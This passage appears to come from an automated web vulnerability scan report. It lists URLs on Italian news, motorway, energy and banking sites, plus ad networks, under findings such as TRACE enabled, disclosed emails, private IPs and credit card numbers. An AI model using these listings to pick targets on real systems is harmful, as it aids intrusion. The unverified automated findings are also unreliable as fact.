21.29. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1296147858@Top

21.30. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1324184542@VideoBox

21.31. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1325040199@Top

21.32. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1325862690@VideoBox

21.33. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1330035575@Top

21.34. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1358797100@VideoBox

21.35. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1382468384@Top

21.36. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1462887643@VideoBox

21.37. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1508417434@VideoBox

21.38. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1509693265@VideoBox

21.39. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1528770217@Top

21.40. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1606364606@Top

21.41. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1635928635@Top

21.42. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1638950036@Top

21.43. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1641201147@Top

21.44. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1653859896@Top

21.45. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1661812876@VideoBox

21.46. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1697112607@VideoBox

21.47. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1702407116@VideoBox

21.48. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1749243213@VideoBox

21.49. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1759484511@VideoBox

21.50. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1797842055@Top

21.51. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1879543831@Top

21.52. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1884277491@Top

21.53. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1908765693@VideoBox

21.54. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1958902328@VideoBox

21.55. http://answers.yahoo.com/question/index

21.56. http://assicurazione-auto.ansa.it/

21.57. http://attiva.ilsole24ore.com/pr_home.jsp

21.58. http://digg.com/submit

21.59. http://du.ilsole24ore.com/utenti/Registrazione.aspx

21.60. http://du.ilsole24ore.com/utenti/facebook_connect.aspx

21.61. http://edition.cnn.com/video/flashLive/live.html

21.62. http://eni.com/en_IT/company/corporate-communication/eni-social-media/eni-social-media.shtml

21.63. http://eni.com/en_IT/company/culture-energy/figures/figures.shtml

21.64. http://eni.com/en_IT/sustainability/news/2010-10-20-eni-global-leaders-2010.shtml

21.65. http://finanza-mercati.ilsole24ore.com/quotazioni.php

21.66. http://fls.doubleclick.net/activityi

21.67. http://googleads.g.doubleclick.net/pagead/ads

21.68. http://itunes.apple.com/it/app/id395924638

21.69. http://job24.ilsole24ore.com/news/Articoli/2011/04/bertolino-Consumer-Retention-Management-aprile-2011.php

21.70. http://mail.alice.it/

21.71. http://paginebianche.ilsole24ore.com/execute.cgi

21.72. http://paginegialle.ilsole24ore.com/pgolfe/action

21.73. http://searchcio-midmarket.techtarget.com/

21.74. http://searchcio-midmarket.techtarget.com/definition/Ohms-Law

21.75. http://searchcio-midmarket.techtarget.com/definition/expert-system

21.76. http://searchcio-midmarket.techtarget.com/resources/CIO-Midmarket-Resources

21.77. http://searchcio-midmarket.techtarget.com/tip/Remote-backup-can-ease-network-disaster-recovery2

21.78. http://searchcio-midmarket.techtarget.com/tip/VoIP-now-part-of-phishing-attacks2

21.79. http://searchcio.techtarget.com/news/2240030637/CIO-survey-IT-salaries-in-2010-and-how-they-vary-by-industry

21.80. http://technology.searchcio-midmarket.com/kw

21.81. http://webshop.elsevier.com/

21.82. http://webshop.elsevier.com/illustrationservices/

21.83. http://webshop.elsevier.com/myarticleservices/booklets/

21.84. http://webshop.elsevier.com/specialissues/

21.85. http://www.absoluteastronomy.com/ads/searchbox1.htm

21.86. http://www.absoluteastronomy.com/topics/Expert_system

21.87. http://www.absoluteastronomy.com/topics/topichome.aspx

21.88. http://www.addthis.com/bookmark.php

21.89. http://www.agip.at/at/html/folder_1209.shtml

21.90. http://www.agip.de/de/html/folder_13.shtml

21.91. http://www.agip.ro/ro/html/folder_1769.shtml

21.92. http://www.agip.si/si/html/folder_1849.shtml

21.93. http://www.altergaz.fr/

21.94. http://www.ansa.it/

21.95. http://www.ansa.it/motori/

21.96. http://www.ansa.it/web/google/googleresults.html

21.97. http://www.ansa.it/web/notizie/photostory/primopiano/2011/05/02/visualizza_new.html_874819972.html

21.98. http://www.ansa.it/web/notizie/rubriche/cronaca/2011/05/02/visualizza_new.html_875536879.html

21.99. http://www.ansa.it/web/notizie/videostory/curiosita/2009/09/27/visualizza_new.html_735528534.html

21.100. http://www.ansa.it/web/notizie/videostory/primopiano/2011/05/02/visualizza_new.html_875475343.html

21.101. http://www.ansa.it/web/static/indice_letti.html

21.102. http://www.ansa.it/web/static/indice_suggeriti.html

21.103. http://www.ansa.it/web/static/photo_newsmap.html

21.104. http://www.ansa.it/web/static/tutti_tags.html

21.105. http://www.ansa.it/web/static/video_newsmap.html

21.106. http://www.autostrade.it/

21.107. http://www.autostrade.it/assistenza-al-traffico/sicurezza.html

21.108. http://www.autostrade.it/assistenza-al-traffico/tutor.html

21.109. http://www.autostrade.it/chi-siamo/attinternaz_index.html

21.110. http://www.autostrade.it/chi-siamo/eventicultura_index.html

21.111. http://www.autostrade.it/chi-siamo/index.html

21.112. http://www.autostrade.it/chi-siamo/media_index.html

21.113. http://www.autostrade.it/chi-siamo/missione_index.html

21.114. http://www.autostrade.it/chi-siamo/profilo_index.html

21.115. http://www.autostrade.it/chi-siamo/storia_index.html

21.116. http://www.autostrade.it/chi-siamo/valori_index.html

21.117. http://www.autostrade.it/comunicati/comunicati_data.jsp

21.118. http://www.autostrade.it/comunicati/comunicato_dettaglio.jsp

21.119. http://www.autostrade.it/comunicati/index.jsp

21.120. http://www.autostrade.it/opere/avvisi-al-pubblico.html

21.121. http://www.autostrade.it/opere/impatto_viabilita.html

21.122. http://www.autostrade.it/opere/index.html

21.123. http://www.autostrade.it/opere/interventi_incorso.html

21.124. http://www.autostrade.it/opere/iter_approvativo.html

21.125. http://www.autostrade.it/opere/lavori-in-corso.html

21.126. http://www.autostrade.it/opere/piano-investimenti.html

21.127. http://www.autostrade.it/opere/piano_comunicazione.html

21.128. http://www.autostrade.it/opere/stato_avanzamento.html

21.129. http://www.autostrade.it/punto-blu/index.html

21.130. http://www.autostrade.it/sostenibilita/carta.htm

21.131. http://www.autostrade.it/sostenibilita/contatti.html

21.132. http://www.autostrade.it/sostenibilita/corporate-governance.html

21.133. http://www.autostrade.it/sostenibilita/creazione-valore-aggiunto.html

21.134. http://www.autostrade.it/sostenibilita/csr-auto.html

21.135. http://www.autostrade.it/sostenibilita/energia.html

21.136. http://www.autostrade.it/sostenibilita/index.html

21.137. http://www.autostrade.it/sostenibilita/principali-indicatori.html

21.138. http://www.autostrade.it/sostenibilita/rapporti-sostenibilita.html

21.139. http://www.autostrade.it/sostenibilita/spese-investimenti.html

21.140. http://www.autostrade.it/sostenibilita/stk_eng.html

21.141. http://www.autostrade.it/stampa/contattaci.html

21.142. http://www.autostrade.it/stampa/dossier_index.html

21.143. http://www.banchedati.ilsole24ore.com/

21.144. http://www.casa.it/vendita

21.145. http://www.computerworld.com/s/article/9214732/Semantic_Web_Tools_you_can_use

21.146. http://www.facebook.com/plugins/like.php

21.147. http://www.genialloyd.it/GlfeWeb/gl/it/home.html

21.148. http://www.ilsole24ore.com/

21.149. http://www.ilsole24ore.com/art/notizie/2011-05-02/morte-bin-laden-pakistan-afghanistan-093710.shtml

21.150. http://www.luxury24.ilsole24ore.com/

21.151. http://www.luxury24.ilsole24ore.com/images/loadingAnimation.gif

21.152. http://www.sciencedirect.com/science/journal/09574174

21.153. http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp

21.154. http://www.shopping24.ilsole24ore.com/sh4/catalog/Product.jsp

21.155. http://www.shopping24.ilsole24ore.com/sh4/catalog/order/statoOrdine.jsp

21.156. http://www.shopping24.ilsole24ore.com/sh4/js/adddomloadevent.js

21.157. http://www.telecomitalia.it/

21.158. http://www.telepass.it/ecm/faces/public/telepass/

21.159. http://www.virgilio.it/common/errore/404.html

21.160. http://www.zanox.com/en/

21.161. http://www.zanox.com/us/

22. TRACE method is enabled

22.1. http://ad78.neodatagroup.com/

22.2. http://adlev.neodatagroup.com/

22.3. http://adv.ilsole24ore.it/

22.4. https://areaclienti187.telecomitalia.it/

22.5. http://assicurazione-auto.ansa.it/

22.6. http://attiva.ilsole24ore.com/

22.7. http://auth.rossoalice.alice.it/

22.8. http://digg.com/

22.9. http://eni.com/

22.10. http://factbook.eni.com/

22.11. http://imagesdotcom.ilsole24ore.com/

22.12. http://job24.ilsole24ore.com/

22.13. http://metrics.ilsole24ore.com/

22.14. http://modelli-listini.motori.ansa.it/

22.15. http://multicard.eni.com/

22.16. http://omniture.virgilio.it/

22.17. http://pixel.rubiconproject.com/

22.18. http://secure-it.imrworldwide.com/

22.19. http://video.ilsole24ore.com/

22.20. https://www.eni.com/

22.21. http://www.insoldoni.it/

22.22. http://www.luxury24.ilsole24ore.com/

22.23. http://www.motori24.ilsole24ore.com/

22.24. http://www.shopping24.ilsole24ore.com/

22.25. http://www.virgilio.it/

23. Directory listing

24. Email addresses disclosed

24.1. https://account.musfiber.com/forgot.php

24.2. http://attiva.ilsole24ore.com/pr_home.jsp

24.3. http://du.ilsole24ore.com/utenti/Registrazione.aspx

24.4. http://en.camera.it/javascripts/cache/Camera_ENG.04e3e95b032e2b5b8336f33011507023.js

24.5. http://expertsystem.net/

24.6. http://expertsystem.net/clienti_dettaglio.asp

24.7. http://expertsystem.net/clienti_elenco.asp

24.8. http://expertsystem.net/clienti_home.asp

24.9. http://expertsystem.net/demo_prodotti.asp

24.10. http://expertsystem.net/page.asp

24.11. http://expertsystem.net/page.asp

24.12. http://expertsystem.net/vetrinanews.asp

24.13. http://job24.ilsole24ore.com/news/Articoli/2011/04/bertolino-Consumer-Retention-Management-aprile-2011.php

24.14. http://jsdotcom.ilsole24ore.com/js2010/MobileCompatibility.js

24.15. http://mail.musfiber.com/SkinFiles/musfiber.com/Pronto-/strings.xdata

24.16. http://media.techtarget.com/rms/ux/javascript/jquery.writeCapture.js

24.17. http://media.techtarget.com/rms/ux/javascript/moScripts.js

24.18. http://media.techtarget.com/rms/ux/javascript/writeCapture.js

24.19. http://media.techtarget.com/searchCIO-Midmarket/images/homepageFloater_backgroundVertical.gif

24.20. http://multicard.eni.com/it_en

24.21. http://searchcio-midmarket.techtarget.com/definition/Ohms-Law

24.22. http://searchcio-midmarket.techtarget.com/definition/expert-system

24.23. http://searchcio-midmarket.techtarget.com/news/article/0,289142,sid183_gci1518105_mem1,00.html

24.24. http://searchcio-midmarket.techtarget.com/tip/Remote-backup-can-ease-network-disaster-recovery2

24.25. http://searchcio-midmarket.techtarget.com/tip/VoIP-now-part-of-phishing-attacks2

24.26. http://searchcio-midmarket.techtarget.com/tip/VoIP-privacy-on-the-WAN2

24.27. http://searchcio.techtarget.com/news/2240030637/CIO-survey-IT-salaries-in-2010-and-how-they-vary-by-industry

24.28. http://searchstorage.techtarget.com/digitalguide/images/buttons/button_closeThisWindow.gif

24.29. http://translate.googleapis.com/translate_a/t

24.30. http://videoplayer.nlps.com/

24.31. http://webshop.elsevier.com/framework/js/ajax/wddx.js

24.32. http://www.30percento.it/

24.33. http://www.ansa.it/

24.34. http://www.ansa.it/motori/

24.35. http://www.ansa.it/web/google/googleresults.html

24.36. http://www.ansa.it/web/js/jquery.atextsize.js

24.37. http://www.ansa.it/web/js/jquery.cookie.js

24.38. http://www.ansa.it/web/notizie/photostory/primopiano/2011/05/02/visualizza_new.html_874819972.html

24.39. http://www.ansa.it/web/notizie/rubriche/cronaca/2011/05/02/visualizza_new.html_875536879.html

24.40. http://www.ansa.it/web/notizie/videostory/curiosita/2009/09/27/visualizza_new.html_735528534.html

24.41. http://www.ansa.it/web/notizie/videostory/primopiano/2011/05/02/visualizza_new.html_875475343.html

24.42. http://www.ansa.it/web/static/indice_letti.html

24.43. http://www.ansa.it/web/static/indice_suggeriti.html

24.44. http://www.ansa.it/web/static/photo_newsmap.html

24.45. http://www.ansa.it/web/static/tutti_tags.html

24.46. http://www.ansa.it/web/static/video_newsmap.html

24.47. http://www.autostrade.it/chi-siamo/media_index.html

24.48. http://www.autostrade.it/sostenibilita/contatti.html

24.49. http://www.autostrade.it/sostenibilita/stk_eng.html

24.50. http://www.autostrade.it/stampa/contattaci.html

24.51. http://www.camera.it/javascripts/cache/Camera.94a1c77f6b66cfdcc9636f18c560a41e.js

24.52. http://www.capterra.com/

24.53. http://www.capterra.com/javascripts/controls.js

24.54. http://www.capterra.com/javascripts/dragdrop.js

24.55. http://www.elsevier.com/authored_framework/include/js/v5/menu/dynlayer-common.js

24.56. http://www.elsevier.com/authored_framework/include/js/v5/menu/dynlayer.js

24.57. http://www.elsevier.com/authored_framework/include/js/v5/menu/mouseevents.js

24.58. http://www.eni.com/en_IT/home.html

24.59. http://www.eni.com/en_IT/static/js/homepage_eni_com/jquery.colorbox-min.js

24.60. http://www.eni.com/en_IT/static/js/homepage_eni_com/jquery.pngFix.js

24.61. https://www.eni.com/en_IT/static/js/homepage_eni_com/jquery.colorbox-min.js

24.62. https://www.eni.com/en_IT/static/js/pagine_salvate/jquery.cookie.js

24.63. http://www.genialloyd.it/GlfeWeb/gl/it/home.html

24.64. http://www.luxury24.ilsole24ore.com/js/jquery.dimensions.js

24.65. http://www.luxury24.ilsole24ore.com/js/jquery.gradient.js

24.66. http://www.pcai.com/web/ai_info/expert_systems.html

24.67. http://www.sciencedirect.com/science/page/javascript/controls_mod.js

24.68. https://www.sciencedirect.com/science/page/javascript/controls_mod.js

24.69. http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp

24.70. http://www.shopping24.ilsole24ore.com/sh4/catalog/Product.jsp

24.71. http://www.shopping24.ilsole24ore.com/sh4/catalog/order/statoOrdine.jsp

24.72. http://www.zanox.com/system/modules/com.zanox.frontend.main.templates.resources/resources/scripts/jquery.pxtoem.js

25. Private IP addresses disclosed

25.1. http://blogs.adobe.com/psirt/

25.2. http://blogs.adobe.com/psirt/category/security-bulletins-and-advisories

25.3. http://compraonline.mediaworld.it/webapp/wcs/stores/servlet/PartnerVisit

25.4. http://connect.facebook.net/it_IT/all.js

25.5. http://digg.com/submit

25.6. http://i.plug.it/iplug/js/lib/mtx/omniture/domains/tracking_mail.alice.it.js

25.7. http://static.ak.fbcdn.net/connect/xd_proxy.php

25.8. http://static.ak.fbcdn.net/connect/xd_proxy.php

25.9. http://static.ak.fbcdn.net/connect/xd_proxy.php

25.10. http://www.camera.it/javascripts/cache/Camera.94a1c77f6b66cfdcc9636f18c560a41e.js

25.11. http://www.casa.it/vendita

25.12. http://www.eni.com/attachments/publications/reports/reports-2009/Eni-in-2009.pdf

25.13. http://www.facebook.com/extern/login_status.php

25.14. http://www.facebook.com/extern/login_status.php

25.15. http://www.facebook.com/extern/login_status.php

25.16. http://www.facebook.com/extern/login_status.php

25.17. http://www.facebook.com/extern/login_status.php

25.18. http://www.facebook.com/extern/login_status.php

25.19. http://www.facebook.com/extern/login_status.php

25.20. http://www.facebook.com/extern/login_status.php

25.21. http://www.facebook.com/extern/login_status.php

25.22. http://www.facebook.com/extern/login_status.php

25.23. http://www.facebook.com/extern/login_status.php

25.24. http://www.facebook.com/extern/login_status.php

25.25. http://www.facebook.com/extern/login_status.php

25.26. http://www.facebook.com/extern/login_status.php

25.27. http://www.facebook.com/extern/login_status.php

25.28. http://www.facebook.com/extern/login_status.php

25.29. http://www.facebook.com/extern/login_status.php

25.30. http://www.facebook.com/extern/login_status.php

25.31. http://www.facebook.com/plugins/like.php

25.32. http://www.facebook.com/plugins/like.php

25.33. http://www.facebook.com/plugins/like.php

25.34. http://www.facebook.com/plugins/like.php

26. Credit card numbers disclosed

26.1. http://bs.serving-sys.com/BurstingPipe/adServer.bs

26.2. http://www.bing.com/search

26.3. http://www.eni.com/attachments/azienda/profilo-compagnia/eni_sintesi_eng.pdf

26.4. http://www.eni.com/attachments/media/press-release/2010/10/press-release-2010-third-quarter-results.pdf

26.5. http://www.eni.com/attachments/media/press-release/2011/02/press-release-2010-fourth-quarter-results.pdf

26.6. http://www.eni.com/attachments/media/press-release/2011/04/press-release-2011-first-quarter-results.pdf

26.7. http://www.eni.com/attachments/publications/reports/reports-2009/Eni-in-2009.pdf

27. Robots.txt file

27.1. http://0.r.msn.com/

27.2. http://ad-emea.doubleclick.net/adj/N3024.Ilsole24ore/B5421871.2

27.3. http://adimg.alice.it/tracks/bi/images/bi_clk.gif

27.4. http://answers.yahoo.com/question/index

27.5. http://api.bing.com/qsonhs.aspx

27.6. http://assicurazione-auto.ansa.it/

27.7. http://bs.serving-sys.com/BurstingPipe/adServer.bs

27.8. http://cdn4.eyewonder.com/cm/tr/17671-124835-21707-7

27.9. http://clients1.google.com/complete/search

27.10. http://compraonline.mediaworld.it/webapp/wcs/stores/servlet/PartnerVisit

27.11. http://digg.com/submit

27.12. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_2_7/StdBanner.js

27.13. http://edition.cnn.com/video/flashLive/live.html

27.14. http://en.camera.it/

27.15. http://factbook.eni.com/en

27.16. https://feedback.live.com/default.aspx

27.17. http://fls.doubleclick.net/activityi

27.18. http://friendfeed.com/share

27.19. http://giochi-tiscali.king.com/giochi/giochi-di-carte/uno/

27.20. http://go.microsoft.com/fwlink/

27.21. http://imagesdotcom.ilsole24ore.com/images2010/SoleOnLine5/_Immagini/Notizie/USA/2011/05/bin-laden-morte-reuters-672.jpg

27.22. http://it.yahoo.com/add

27.23. http://itunes.apple.com/it/app/id395924638

27.24. http://metrics.ilsole24ore.com/b/ss/s24onewsprod,s24oglobal/1/H.20.3/s78620203291065

27.25. http://mfr.247realmedia.com/RealMedia/ads/adstream.cap/123

27.26. http://multicard.eni.com/it_en

27.27. http://nuovo.camera.it/Camera/view/doc_viewer_full

27.28. http://omniture.virgilio.it/b/ss/tiecommercepreprod,tivirgilioglobalpreprod/1/H.22.1/s79412251526955

27.29. http://paginegialle.ilsole24ore.com/pgolfe/action

27.30. http://safebrowsing.clients.google.com/safebrowsing/downloads

27.31. http://sdc.eni.it/dcs67gfdv000000ggn52ira0x_5q6n/dcs.gif

27.32. http://search.yahoo.com/bin/search

27.33. http://searchcio.techtarget.com/news/2240030637/CIO-survey-IT-salaries-in-2010-and-how-they-vary-by-industry

27.34. http://static.ak.fbcdn.net/connect/xd_proxy.php

27.35. http://translate.googleapis.com/translate_a/t

27.36. https://ui.zanox-affiliate.de/bin/z_in_frm.dll

27.37. https://www.eni.com/public/login-en_IT.shtml

27.38. http://www.googleadservices.com/pagead/conversion/1039428624/

27.39. http://www.insoldoni.it/campagna/campagna.html

27.40. http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp

27.41. http://www.yoox.com/_partners/luxury24/luxury24_210x195.html

27.42. http://www.zanox.com/us/

28. Cacheable HTTPS response

28.1. https://eprocurement.eni.it/default.asp

28.2. https://seal.verisign.com/getseal

28.3. https://webshop.elsevier.com/framework/cf/ga.cfm

28.4. https://webshop.elsevier.com/framework/empty.htm

28.5. https://webshop.elsevier.com/login.cfm

28.6. https://www.eni.com/attachments/images/highslide/graphics/zoomout.cur

28.7. https://www.eni.com/login/LoginServletOSSO

28.8. https://www.sciencedirect.com/science

28.9. https://www.webank.it/favicon.ico

28.10. https://www.webank.it/swf/xml/hp_cellette.xml

28.11. https://www.webank.it/webankpub/wb/2l/do/aol/wbwsPUaol0.do

28.12. https://www.webank.it/webankpub/wb/fpServizi.do

28.13. https://www.webank.it/webankpub/wb/generaIMG.do

28.14. https://www.webank.it/webankpub/wb/home.do

28.15. https://www.webank.it/webankpub/wb/jsp/hp_menu_xml.jsp

29. Multiple content types specified

30. HTML does not specify charset

30.1. http://a.tribalfusion.com/j.ad

30.2. http://ad.doubleclick.net/adi/N2886.Tribal_Fusion/B5403001.12

30.3. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1024974673/SpotLight_03/OasDefault/Autopromo_SGR_100x53/Autopromo_SGR50324.html/61646331643666333464626632633930

30.4. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/108663937/TextBox_05/OasDefault/Publiscoop_SHW_textbox_2009_3/platinum_gif549825602457102593956826371562744967959685433.html/61646331643666333464626632633930

30.5. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1086908088/SpotLight_01/OasDefault/Autopromo_SGR_100x53/Autopromo_SGR.html/61646331643666333464626632633930

30.6. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1121189356/TextBox_04/OasDefault/Autopromo_SGR_100x53/Autopromo_SGR50328.html/61646331643666333464626632633930

30.7. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1202449739/PopUp/OasDefault/Autopromo_XGR_PopUp/popup_vuoto_deabyday.html/61646331643666333464626632633930

30.8. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1276087592/Right3/OasDefault/BOX_QUI_IMPRESE_SHW_080327/box_qui_imprese56058560617150171759.html/61646331643666333464626632633930

30.9. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1294602541/TextBox_01/OasDefault/BSide_SHW_t1_110425/BSide_SHW_t5_1001206701868184685496908169278696457055170903710787133771509722047340875087759047639776398766527686677058771767741477415782247919885905.html/61646331643666333464626632633930

30.10. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1303054267/SpotLight_02/OasDefault/GruppoImmobiliare_SHP_s1_110426/Spotlight1_Spotlight.html/61646331643666333464626632633930

30.11. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1334703460/LittleBox_03/OasDefault/Publiscoop_SHW_textbox_2009_2/Prova_TextBox_1411294113141166433364410645565482074889049975504425044352584535175881261295654246849571561734217681881682.html/61646331643666333464626632633930

30.12. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/133992155/Top/OasDefault/Radiocor_SHP_tb_110502/Top_NotiziarioAsia.html/61646331643666333464626632633930

30.13. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1376074468/VideoBox_3/OasDefault/Autopromo_SGR_300x250_bottom/----VIAGGI24.html/61646331643666333464626632633930

30.14. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1550753390/TextBox_06/OasDefault/BSide_SHW_t6_110406/BSide_SHW_t5_1001206701868184685496908169278696457055170903710787133771509722047340875087759047639776398766527686677058771767741477415782247919887014.html/61646331643666333464626632633930

30.15. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/177060126/TextBox_02/OasDefault/hotel24_SHW_textbox_091008/hotel24.jpg71529.html/61646331643666333464626632633930

30.16. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/2007468888/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

30.17. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/432046773/MaxTicker_01/OasDefault/Autopromo_SGR_990x30_VUOTO/Autopromo_SGR_990x30_VUOTO.html/61646331643666333464626632633930

30.18. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/766161316/VideoBox/OasDefault/Transition_SHP_b1_110502/8728887291.html/61646331643666333464626632633930

30.19. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/810856577/LittleBox_01/OasDefault/Publiscoop_SHW_textbox_2009/494984969849885499905090951136514195159151860522275258753058533275359353801538745698257412602566048760692.html/61646331643666333464626632633930

30.20. http://bs.serving-sys.com/BurstingPipe/adServer.bs

30.21. http://fls.doubleclick.net/activityi

30.22. http://geoisp.alice.it/settacookie.html

30.23. http://geoisp.alice.it/virgilio/local/create_alice_vlocal_city_cookie.html

30.24. http://geoisp.virgilio.it/geo.php

30.25. http://nuovo.camera.it/Camera/view/doc_viewer_full

30.26. http://techtarget-www.baynote.net/baynote/tags3/common

30.27. http://use.typekit.com/k/prb2oqp-e.css

30.28. http://videoplayer.nlps.com/

30.29. http://web.missouri.edu/jonassend/courses/mindtool/ExpertExamples.html

30.30. https://webshop.elsevier.com/framework/empty.htm

30.31. http://www.absoluteastronomy.com/ads/searchbox1.htm

30.32. http://www.autostrade.it/assistenza-al-traffico/sicurezza.html

30.33. http://www.autostrade.it/assistenza-al-traffico/tutor.html

30.34. http://www.autostrade.it/chi-siamo/attinternaz_index.html

30.35. http://www.autostrade.it/chi-siamo/eventicultura_index.html

30.36. http://www.autostrade.it/chi-siamo/index.html

30.37. http://www.autostrade.it/chi-siamo/media_index.html

30.38. http://www.autostrade.it/chi-siamo/missione_index.html

30.39. http://www.autostrade.it/chi-siamo/profilo_index.html

30.40. http://www.autostrade.it/chi-siamo/storia_index.html

30.41. http://www.autostrade.it/chi-siamo/valori_index.html

30.42. http://www.autostrade.it/favicon.ico

30.43. http://www.autostrade.it/infobox/consigli/news1.html

30.44. http://www.autostrade.it/infobox/focuson/news2.html

30.45. http://www.autostrade.it/infobox/iniziative/news1.html

30.46. http://www.autostrade.it/infobox/miglioramento/news2.html

30.47. http://www.autostrade.it/infobox/news/news17.html

30.48. http://www.autostrade.it/infobox/servizi/news1.html

30.49. http://www.autostrade.it/infobox/sicurezza/news1.html

30.50. http://www.autostrade.it/opere/avvisi-al-pubblico.html

30.51. http://www.autostrade.it/opere/impatto_viabilita.html

30.52. http://www.autostrade.it/opere/index.html

30.53. http://www.autostrade.it/opere/interventi_incorso.html

30.54. http://www.autostrade.it/opere/iter_approvativo.html

30.55. http://www.autostrade.it/opere/lavori-in-corso.html

30.56. http://www.autostrade.it/opere/piano-investimenti.html

30.57. http://www.autostrade.it/opere/piano_comunicazione.html

30.58. http://www.autostrade.it/opere/stato_avanzamento.html

30.59. http://www.autostrade.it/punto-blu/index.html

30.60. http://www.autostrade.it/sostenibilita/carta.htm

30.61. http://www.autostrade.it/sostenibilita/contatti.html

30.62. http://www.autostrade.it/sostenibilita/corporate-governance.html

30.63. http://www.autostrade.it/sostenibilita/creazione-valore-aggiunto.html

30.64. http://www.autostrade.it/sostenibilita/csr-auto.html

30.65. http://www.autostrade.it/sostenibilita/energia.html

30.66. http://www.autostrade.it/sostenibilita/index.html

30.67. http://www.autostrade.it/sostenibilita/principali-indicatori.html

30.68. http://www.autostrade.it/sostenibilita/rapporti-sostenibilita.html

30.69. http://www.autostrade.it/sostenibilita/spese-investimenti.html

30.70. http://www.autostrade.it/sostenibilita/stk_eng.html

30.71. http://www.autostrade.it/stampa/contattaci.html

30.72. http://www.autostrade.it/stampa/dossier_index.html

30.73. http://www.camera.it/Camera/view_groups/render_widget_on_ajax/1

30.74. http://www.camera.it/Camera/view_groups/render_widget_on_ajax/262

30.75. http://www.camera.it/Camera/view_groups/render_widget_on_ajax/537

30.76. http://www.elsevier.com/legacy_products/p39/939/939_01_specialissues.html

30.77. http://www.elsevier.com/legacy_products/p39/939/939_01_specialissuestab.html

30.78. http://www.eni.com/login/LoginServletOSSO

30.79. https://www.eni.com/login/LoginServletOSSO

30.80. http://www.pcai.com/favicon.ico

30.81. http://www.pcai.com/web/ai_info/web/buttons/hpcontents2.gif

30.82. http://www.pcai.com/web/ai_info/web/buttons/hphelp2.gif

30.83. http://www.pcai.com/web/ai_info/web/buttons/hphome2.gif

30.84. http://www.pcai.com/web/ai_info/web/buttons/hpnews2.gif

30.85. http://www.pcai.com/web/ai_info/web/buttons/hpsearch2.gif

30.86. http://www.pcai.com/web/ai_info/web/buttons/hpservices2.gif

